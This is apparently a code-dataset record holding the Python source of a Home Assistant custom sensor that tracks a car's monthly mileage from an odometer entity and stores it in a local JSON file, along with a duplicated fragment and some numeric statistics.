unit_of_measurement self._state = STATE_UNKNOWN self.data = data self.update() @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self.data.getMilageForCurrentMonth() @property def unit_of_measurement(self): """Return the unit of measurement.""" return self._unit_of_measurement @property def device_state_attributes(self): """Return device specific state attributes.""" return self.data.values def update(self): """Fetch new state data for the sensor. This is the only method that should fetch new data for Home Assistant. """ if self._hass.state not in (CoreState.starting, CoreState.not_running): self.data.update() value = self.data.values class CarMilageData(object): """docstring for CarMilageData""" def getMilageForCurrentMonth(self): """ Returns the current month milage value """ current_month = str(datetime.now().month).lstrip("0") return self.getMilageForMonth(current_month) def setMilageForCurrentMonth(self, odometer_value): """ Sets the passed value to the current month milage value in the self.milageFile file """ current_month = str(datetime.now().month).lstrip("0") current_month_name = calendar.month_name[int(current_month)] _LOGGER.debug("Updating milage for month: %s to: %s", current_month_name, odometer_value) self.values['current_month'] = odometer_value with open(self.milageFile, 'r') as milage: data = json.load(milage) data[current_month_name] = odometer_value os.remove(self.milageFile) with open(self.milageFile, 'w') as milage: json.dump(data, milage) def getMilageForMonth(self, month): """ This method will return corresponding milage odometer value for the passed month by reading it from the self.milageFile file. """ monthName = calendar.month_name[int(month)] with open(self.milageFile) as milage: data = json.load(milage) for key, value in data.items(): if str(key) == str(monthName): return value def getStateValueFromEntity(self, entity): """ Get the current state from the passed entity """ state = self.hass.states.get(entity) return int(state.state) def setLastKnownValue(self, odometer_value): """ Sets the passed value to the last_known_value in the self.milageFile file and in the list """ _LOGGER.debug("Updating last_known_value to: %s", odometer_value) self.values['last_known_value'] = odometer_value with open(self.milageFile, 'r') as milage: data = json.load(milage) data['last_known_value'] = odometer_value os.remove(self.milageFile) with open(self.milageFile, 'w') as milage: json.dump(data, milage)
35.435556
135
0.658723
""" Configuration: To use the car_milage_per_month component you will need to add the following to your configuration.yaml file: car_milage_per_month: odometer_sensor: sensor.ete123_odometer (the sensor that holds the total amount of km) """ import json import logging import calendar import os import voluptuous as vol import homeassistant.helpers.config_validation as cv from datetime import datetime from homeassistant.const import ( CONF_NAME, CONF_UNIT_OF_MEASUREMENT, LENGTH_KILOMETERS, STATE_UNKNOWN ) from homeassistant.helpers.entity import Entity from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.core import HomeAssistant, CoreState _LOGGER = logging.getLogger(__name__) DEFAULT_NAME = 'car_milage_per_month' DOMAIN = 'car_milage_per_month' CONF_ODOMETER_SENSOR = 'odometer_sensor' PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_ODOMETER_SENSOR): cv.entity_id, vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string }) def setup_platform(hass, config, add_devices, discovery_info=None): """Setup the sensor platform.""" odometer_entity = config.get(CONF_ODOMETER_SENSOR) name = config.get(CONF_NAME) unit = config.get(CONF_UNIT_OF_MEASUREMENT) data = CarMilageData(hass, odometer_entity) add_devices([CarMilageSensor(hass, odometer_entity, name, unit, data)]) class CarMilageSensor(Entity): """Representation of a Sensor.""" def __init__(self, hass, odometer_entity, name, unit_of_measurement, data): """Initialize the sensor.""" self._hass = hass self._odometer_entity = odometer_entity self._name = name self._unit_of_measurement = unit_of_measurement self._state = STATE_UNKNOWN self.data = data self.update() @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self.data.getMilageForCurrentMonth() @property def unit_of_measurement(self): """Return the unit of measurement.""" return self._unit_of_measurement @property def device_state_attributes(self): """Return device specific state attributes.""" return self.data.values def update(self): """Fetch new state data for the sensor. This is the only method that should fetch new data for Home Assistant. """ if self._hass.state not in (CoreState.starting, CoreState.not_running): self.data.update() value = self.data.values class CarMilageData(object): """docstring for CarMilageData""" def __init__(self, hass, odometer_entity): self.values = { 'last_known_value': 0, 'current_month': 0, calendar.month_name[1]: 0, calendar.month_name[2]: 0, calendar.month_name[3]: 0, calendar.month_name[4]: 0, calendar.month_name[5]: 0, calendar.month_name[6]: 0, calendar.month_name[7]: 0, calendar.month_name[8]: 0, calendar.month_name[9]: 0, calendar.month_name[10]: 0, calendar.month_name[11]: 0, calendar.month_name[12]: 0 } self.hass = hass self.odometer_entity = odometer_entity self.milageFile = self.hass.config.path('milage.json') _LOGGER.info("Milage file: %s", self.milageFile) # Create the file if not exist if not os.path.exists(self.milageFile): with open(self.milageFile, 'w') as milage: json.dump(self.values, milage) def update(self): odometer_value = self.getStateValueFromEntity(self.odometer_entity) # If last_known_value is zero, it means that this is the first time running this component, # or the self.milageFile has been removed. Handle this by setting the current last_known_value # to the same value as the odometer_value. Which means that we will start calculating the diff # at the next odometer change if self.values['last_known_value'] == 0: self.setLastKnownValue(odometer_value) # This will ensure we set the new value for current month. if self.getLastKnownValue() < odometer_value: # Get the diff, the milage to add to our month diff = abs(odometer_value - self.values['last_known_value']) _LOGGER.debug( "New odometer value detected. Updating current months milage count. Before: %s After: %s", self.getMilageForCurrentMonth(), self.getMilageForCurrentMonth() + diff ) new_value = self.getMilageForCurrentMonth() + diff self.setMilageForCurrentMonth(new_value) # Set the last known value, after we have updated the current month milage value self.setLastKnownValue(odometer_value) # We interate over all months and set corresponding values, this is not really needed during normal operations, # since the self.values already contains recent values. # But we'll loose them after restart of hass, so we might as well set them every time from file. for i in range(1, 12): _LOGGER.debug("Updating attribute %s with value %s from file", calendar.month_name[i], self.values[calendar.month_name[i]]) self.values[calendar.month_name[i]] = self.getMilageForMonth(i) _LOGGER.debug("%s", self.values) def getMilageForCurrentMonth(self): """ Returns the current month milage value """ current_month = str(datetime.now().month).lstrip("0") return self.getMilageForMonth(current_month) def setMilageForCurrentMonth(self, odometer_value): """ Sets the passed value to the current month milage value in the self.milageFile file """ current_month = str(datetime.now().month).lstrip("0") current_month_name = calendar.month_name[int(current_month)] _LOGGER.debug("Updating milage for month: %s to: %s", current_month_name, odometer_value) self.values['current_month'] = odometer_value with open(self.milageFile, 'r') as milage: data = json.load(milage) data[current_month_name] = odometer_value os.remove(self.milageFile) with open(self.milageFile, 'w') as milage: json.dump(data, milage) def getMilageForMonth(self, month): """ This method will return corresponding milage odometer value for the passed month by reading it from the self.milageFile file. """ monthName = calendar.month_name[int(month)] with open(self.milageFile) as milage: data = json.load(milage) for key, value in data.items(): if str(key) == str(monthName): return value def getStateValueFromEntity(self, entity): """ Get the current state from the passed entity """ state = self.hass.states.get(entity) return int(state.state) def getLastKnownValue(self): with open(self.milageFile) as milage: data = json.load(milage) return int(data['last_known_value']) def setLastKnownValue(self, odometer_value): """ Sets the passed value to the last_known_value in the self.milageFile file and in the list """ _LOGGER.debug("Updating last_known_value to: %s", odometer_value) self.values['last_known_value'] = odometer_value with open(self.milageFile, 'r') as milage: data = json.load(milage) data['last_known_value'] = odometer_value os.remove(self.milageFile) with open(self.milageFile, 'w') as milage: json.dump(data, milage)
2,922
0
80